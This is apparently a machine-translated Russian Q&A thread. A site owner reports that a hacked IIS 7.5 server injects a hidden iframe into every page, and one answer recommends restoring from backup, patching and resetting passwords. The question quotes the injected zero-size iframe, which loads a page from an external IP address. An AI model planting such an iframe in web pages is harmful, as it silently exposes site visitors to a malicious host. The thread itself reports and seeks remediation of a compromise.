IIS 7 Обслуживание всех страниц с внедренным iframe

Question

IIS 7 Обслуживание всех страниц с внедренным iframe

Возможный дубликат:
Мой сервер был взломан АВАРИЙНЫЙ

Это не дубликат. Приведенный выше вопрос не объясняет, как это можно сделать.

Мой VPS только что был взломан, и все мои страницы обслуживаются вредоносным iframe, внедренным непосредственно перед тегом html.

Код выглядит так:

<iframe src= http://117.21.247.171:700/1.htm width=0 height=0></iframe>                                                                                                                                                                                                                                   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR"> ...

Сначала я подумал, что это может быть что-то связанное с WordPress, но мои сайты asp.net также заражены, и даже если я создаю статический HTML-файл, в котором ничего нет, вставляется iframe.

Я использую Windows Server 2008 R2 Standard с IIS7.5 7600.

РЕДАКТИРОВАТЬ: Эй, почему это было закрыто?

Мне очень интересно узнать, как это сделать в IIS, есть идеи?

Andre

-1

iis-7.5 malicious

Источник

Andre Carlucci 16 июн '12 в 15:47

1 ответ

Другие вопросы по тегам iis-7.5 malicious

Dan 16 июн '12 в 16:00 2012-06-16 16:00 · Answer 1 · 2012-06-16 16:00

Для всех намерений и целей это не имеет значения. Ваш сервер был взломан - вам нужно восстановить из последней известной резервной копии и убедиться, что вы полностью исправлены, у вас есть достаточный брандмауэр и IPS, и вы сбросите все пароли.